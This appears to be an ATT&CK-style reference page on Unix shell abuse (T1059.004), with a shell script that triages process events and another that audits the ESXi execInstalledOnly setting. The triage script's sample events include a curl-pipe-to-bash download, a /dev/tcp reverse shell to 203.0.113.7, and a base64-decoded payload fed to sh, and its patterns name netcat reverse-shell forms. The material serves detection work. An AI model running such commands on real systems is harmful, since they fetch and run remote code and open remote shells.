Description
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
Some systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may rely on a stripped-down Unix shell provided by BusyBox, a single small executable that bundles many common Unix utilities, including a simple shell.
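The abuse patterns described above (interactive shells reached over C2 channels, scripts that deliver several commands at once, stripped-down BusyBox shells) all surface in process-creation telemetry as shell invocations with telltale arguments or parents. The triage pass below is an added example, not code from the ATT&CK page or from any vendor product. It classifies a handful of constructed process events (the '|'-delimited layout timestamp|user|parent_image|command_line, every sample line, and the 203.0.113.7 address are made up for illustration) with a small, ordered set of patterns and prints the ones worth a look. The pattern list is an assumption about what is worth flagging, a starting point rather than a complete signature set; the benign cron and interactive-user lines are there to show that shell execution alone is not a signal.

```shell
#!/bin/sh
# Added example: triage process-creation events for Unix shell abuse.
# The event format (timestamp|user|parent_image|command_line) and every
# event below are constructed for illustration; they are not real telemetry.
SAMPLE_EVENTS='2024-05-01T10:00:01Z|www-data|/usr/sbin/apache2|sh -c "curl -s http://203.0.113.7/x.sh | bash"
2024-05-01T10:00:02Z|root|/usr/sbin/sshd|bash -i >& /dev/tcp/203.0.113.7/4444 0>&1
2024-05-01T10:00:03Z|root|/usr/bin/busybox|busybox sh /tmp/.X11-unix/run.sh
2024-05-01T10:00:04Z|alice|/usr/bin/bash|ls -la /home/alice
2024-05-01T10:00:05Z|tomcat|/usr/bin/java|bash -c "echo Y3VybCAuLi4= | base64 -d | sh"
2024-05-01T10:00:06Z|root|/usr/sbin/cron|/bin/sh /etc/cron.daily/logrotate'

# classify_cmdline PARENT_IMAGE COMMAND_LINE
# Prints one tag. Patterns are checked from most to least specific so that a
# command matching several (e.g. a BusyBox shell running a /tmp script) gets
# the most telling label. The pattern set is illustrative, not exhaustive.
classify_cmdline() {
    parent=$1
    cmd=$2
    # Interactive shell wired to a socket: bash /dev/tcp redirection, nc -e, mkfifo+nc.
    # "nc -e" is anchored to avoid matching "rsync -e".
    case $cmd in
        *"/dev/tcp/"*|*"/dev/udp/"*|*"mkfifo"*"nc "*|"nc -e"*|*" nc -e"*|*"ncat -e"*)
            echo reverse-shell; return 0 ;;
    esac
    # Remote content piped or process-substituted straight into a shell.
    case $cmd in
        *curl*"| sh"*|*curl*"| bash"*|*wget*"| sh"*|*wget*"| bash"*|\
        *"sh <(curl"*|*"bash <(curl"*|*"sh <(wget"*|*"bash <(wget"*)
            echo download-and-run; return 0 ;;
    esac
    # Payload decoded on the fly and fed to a shell.
    case $cmd in
        *"base64 -d"*"| sh"*|*"base64 -d"*"| bash"*|*"base64 --decode"*"| sh"*|*"base64 --decode"*"| bash"*)
            echo encoded-payload; return 0 ;;
    esac
    # Stripped-down shell from a BusyBox multi-call binary (embedded, ESXi, minimal images).
    case $cmd in
        *"busybox sh"*|*"busybox ash"*)
            echo busybox-shell; return 0 ;;
    esac
    # A shell interpreting a script dropped in a world-writable location.
    case $cmd in
        *" /tmp/"*|*" /dev/shm/"*|*" /var/tmp/"*)
            case $cmd in
                "sh "*|"bash "*|"dash "*|"ash "*|"zsh "*|*"/sh "*|*"/bash "*)
                    echo script-from-tmp; return 0 ;;
            esac ;;
    esac
    # A shell whose parent is a network-facing service: typical of web-shell
    # or exploitation follow-on, rarely legitimate.
    case $parent in
        */httpd|*/apache2|*/nginx|*/php-fpm|*/java|*/node|*/tomcat)
            case $cmd in
                "sh "*|"bash "*|"dash "*|"ash "*|"zsh "*|*"/sh "*|*"/bash "*)
                    echo shell-from-service; return 0 ;;
            esac ;;
    esac
    echo benign
}

# scan_events: reads events on stdin, prints one tab-separated line per
# suspicious event: tag, timestamp, user, command line. With IFS='|' the
# last variable keeps any further '|' characters, so pipes in the command
# line survive intact.
scan_events() {
    while IFS='|' read -r ts user parent cmd; do
        [ -n "$cmd" ] || continue
        tag=$(classify_cmdline "$parent" "$cmd")
        if [ "$tag" != benign ]; then
            printf '%s\t%s\t%s\t%s\n' "$tag" "$ts" "$user" "$cmd"
        fi
    done
}

# count_findings: number of suspicious events in the constructed sample.
count_findings() {
    printf '%s\n' "$SAMPLE_EVENTS" | scan_events | wc -l | tr -d ' '
}

# Demo: print the findings for the constructed sample (4 of the 6 events).
printf '%s\n' "$SAMPLE_EVENTS" | scan_events
```

Feeding real telemetry in means mapping your source (auditd execve records, EDR process events) onto the four fields; the parent image is what separates an administrator's `sh script.sh` from the same command spawned by a web server, so keep it even if the source makes it awkward to extract.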
Platforms
Mitigations (1)
M1038 Execution Prevention
Use application control where appropriate. On ESXi hosts, the execInstalledOnly feature prevents binaries from being run unless they have been packaged and signed as part of a vSphere installation bundle (VIB).(Citation: Google Cloud Threat Intelligence ESXi Hardening 2023)
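Enabling execInstalledOnly is only half the mitigation; the other half is verifying that it is both configured and active on every host. The check below is an added example, not part of the ATT&CK page or of VMware tooling: it parses the table printed by `esxcli system settings kernel list -o execInstalledOnly` and distinguishes enforced, pending (set but not yet active until reboot), and disabled states. Both sample outputs are constructed, and the column layout (Name, Type, Configured, Runtime, Default, Description) is an assumption to confirm against a real host before relying on the field positions. The esxcli commands quoted in the comments are the documented way to turn the setting on; they are not executed here.

```shell
#!/bin/sh
# Added example: audit the ESXi execInstalledOnly setting from esxcli output.
# Both samples are constructed; the column layout is an assumption about what
# `esxcli system settings kernel list -o execInstalledOnly` prints.
ESXI_WEAK='Name               Type  Configured  Runtime  Default  Description
-----------------  ----  ----------  -------  -------  -----------
execInstalledOnly  Bool  FALSE       FALSE    FALSE    Only allow executing binaries from VIBs'

ESXI_HARDENED='Name               Type  Configured  Runtime  Default  Description
-----------------  ----  ----------  -------  -------  -----------
execInstalledOnly  Bool  TRUE        TRUE     FALSE    Only allow executing binaries from VIBs'

# exec_installed_only_state: reads esxcli output on stdin and prints one of
#   enforced  - configured and active now
#   pending   - configured, but not active until the host is rebooted
#   disabled  - not configured
#   unknown   - the setting row was not found in the input
exec_installed_only_state() {
    awk '$1 == "execInstalledOnly" {
             found = 1
             if ($3 == "TRUE" && $4 == "TRUE") print "enforced"
             else if ($3 == "TRUE")            print "pending"
             else                              print "disabled"
         }
         END { if (!found) print "unknown" }'
}

# audit_host_output: prints the state and succeeds only when it is enforced,
# so it can gate a fleet-wide check.
audit_host_output() {
    state=$(exec_installed_only_state)
    echo "execInstalledOnly: $state"
    [ "$state" = enforced ]
}

# On a real host (not run here) the setting is enabled with the documented
# esxcli commands; the kernel option takes effect at the next boot, the
# advanced option at runtime:
#   esxcli system settings kernel set -s execInstalledOnly -v TRUE
#   esxcli system settings advanced set -o /User/execInstalledOnly -i 1

# Demo over the two constructed samples.
for sample in "$ESXI_WEAK" "$ESXI_HARDENED"; do
    printf '%s\n' "$sample" | audit_host_output || true
done
```

A pending result is the one that slips through casual review: the vSphere client shows the option set, yet until the reboot the host still runs unsigned binaries.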
Threat Groups (10)
| ID | Group | Context |
|---|---|---|
| G0143 | Aquatic Panda | [Aquatic Panda](https://attack.mitre.org/groups/G0143) used malicious shell scripts in Linux environments following access via SSH to install Linux ve... |
| G0139 | TeamTNT | [TeamTNT](https://attack.mitre.org/groups/G0139) has used shell scripts for execution.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligen... |
| G1052 | Contagious Interview | [Contagious Interview](https://attack.mitre.org/groups/G1052) has targeted macOS victim hosts using a bash downloader coremedia.sh and a bash script c... |
| G0106 | Rocke | [Rocke](https://attack.mitre.org/groups/G0106) used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining... |
| G1047 | Velvet Ant | [Velvet Ant](https://attack.mitre.org/groups/G1047) used a custom tool, VELVETSTING, to parse encoded inbound commands to compromised F5 BIG-IP device... |
| G1015 | Scattered Spider | [Scattered Spider](https://attack.mitre.org/groups/G1015) has used the command shell to upload and install the Teleport remote access tool to a compro... |
| G1017 | Volt Typhoon | [Volt Typhoon](https://attack.mitre.org/groups/G1017) has used Brightmetricagent.exe which contains a command- line interface (CLI) library that can l... |
| G0096 | APT41 | [APT41](https://attack.mitre.org/groups/G0096) used Linux shell commands for system survey and information gathering prior to exploitation of vulnerab... |
| G1048 | UNC3886 | [UNC3886](https://attack.mitre.org/groups/G1048) has used a bash script to install malicious vSphere Installation Bundles (VIBs).(Citation: Google Cl... |
| G1041 | Sea Turtle | [Sea Turtle](https://attack.mitre.org/groups/G1041) used shell scripts for post-exploitation execution in victim environments.(Citation: PWC Sea Turtl... |
Associated Software (47)
| ID | Name | Type | Context |
|---|---|---|---|
| S1184 | BOLDMOVE | Malware | [BOLDMOVE](https://attack.mitre.org/software/S1184) is capable of spawning a remote command shell.(Citation: Google Cloud BOLDMOVE 2023) |
| S1224 | CASTLETAP | Malware | [CASTLETAP](https://attack.mitre.org/software/S1224) has the ability to spawn BusyBox command shell in victim environments.(Citation: Mandiant Fortine... |
| S0377 | Ebury | Malware | [Ebury](https://attack.mitre.org/software/S0377) can use the commands `Xcsh` or `Xcls` to open a shell with [Ebury](https://attack.mitre.org/software/... |
| S1107 | NKAbuse | Malware | [NKAbuse](https://attack.mitre.org/software/S1107) is initially installed and executed through an initial shell script.(Citation: NKAbuse SL) |
| S1163 | SnappyTCP | Malware | [SnappyTCP](https://attack.mitre.org/software/S1163) creates the reverse shell using a pthread spawning a bash shell.(Citation: PWC Sea Turtle 2023) |
| S0647 | Turian | Malware | [Turian](https://attack.mitre.org/software/S0647) has the ability to use <code>/bin/sh</code> to execute commands.(Citation: ESET BackdoorDiplomacy Ju... |
| S0482 | Bundlore | Malware | [Bundlore](https://attack.mitre.org/software/S0482) has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.(Citation: MacKeeper... |
| S0587 | Penquin | Malware | [Penquin](https://attack.mitre.org/software/S0587) can execute remote commands using bash scripts.(Citation: Leonardo Turla Penquin May 2020) |
| S0599 | Kinsing | Malware | [Kinsing](https://attack.mitre.org/software/S0599) has used Unix shell scripts to execute commands in the victim environment.(Citation: Aqua Kinsing A... |
| S0641 | Kobalos | Malware | [Kobalos](https://attack.mitre.org/software/S0641) can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.(Citation: ESE... |
| S0021 | Derusbi | Malware | [Derusbi](https://attack.mitre.org/software/S0021) is capable of creating a remote Bash shell and executing commands.(Citation: Fidelis Turbo)(Citatio... |
| S1108 | PULSECHECK | Malware | [PULSECHECK](https://attack.mitre.org/software/S1108) can use Unix shell script for command execution.(Citation: Mandiant Pulse Secure Zero-Day April ... |
| S0220 | Chaos | Malware | [Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell connection on 8338/TCP, encrypted via AES.(Citation: Chaos Stolen Backdoor) |
| S1105 | COATHANGER | Malware | [COATHANGER](https://attack.mitre.org/software/S1105) provides a BusyBox reverse shell for command and control.(Citation: NCSC-NL COATHANGER Feb 2024) |
| S0502 | Drovorub | Malware | [Drovorub](https://attack.mitre.org/software/S0502) can execute arbitrary commands as root on a compromised system.(Citation: NSA/FBI Drovorub August ... |
| S0352 | OSX_OCEANLOTUS.D | Malware | [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses a shell script as the main executable inside an app bundle and drops an embedded base... |
| S0504 | Anchor | Malware | [Anchor](https://attack.mitre.org/software/S0504) can execute payloads via shell scripting.(Citation: Medium Anchor DNS July 2020) |
| S0451 | LoudMiner | Malware | [LoudMiner](https://attack.mitre.org/software/S0451) used shell scripts to launch various services and to start/stop the QEMU virtualization.(Citation... |
| S9008 | Shai-Hulud | Malware | [Shai-Hulud](https://attack.mitre.org/software/S9008) has utilized Linux shell commands to modify configuration files.(Citation: Socket Shai-Hulud Nov... |
| S0584 | AppleJeus | Malware | [AppleJeus](https://attack.mitre.org/software/S0584) has used shell scripts to execute commands after installation and set persistence mechanisms.(Cit... |
Related CWE Weaknesses
References
- Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.
- die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.
Frequently Asked Questions
What is T1059.004 (Unix Shell)?
T1059.004 is a MITRE ATT&CK technique named 'Unix Shell'. It belongs to the Execution tactic(s). Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g....
How can T1059.004 be detected?
Detecting T1059.004 (Unix Shell) starts with process-creation telemetry (auditd execve records or EDR process events on Linux and macOS, /var/log/shell.log on ESXi) that records the shell binary, its arguments and its parent process. Useful signals are shells spawned by network-facing services or by implants reached over C2 channels, interactive shells redirected to a network socket (reverse shells), remote content piped straight into sh or bash, scripts executed from temporary or world-writable directories, and BusyBox shells on hosts that should not be using them. Because administrators and cron also run shells and scripts constantly, baseline normal usage and alert on parent-child and argument combinations rather than on shell execution alone.
What mitigations exist for T1059.004?
There is 1 documented mitigation for T1059.004: Execution Prevention (M1038), which covers application control and, on ESXi hosts, the execInstalledOnly setting that restricts execution to binaries shipped in signed VIBs.
Which threat groups use T1059.004?
Known threat groups using T1059.004 include: Aquatic Panda, TeamTNT, Contagious Interview, Rocke, Velvet Ant, Scattered Spider, Volt Typhoon, APT41, UNC3886, and Sea Turtle.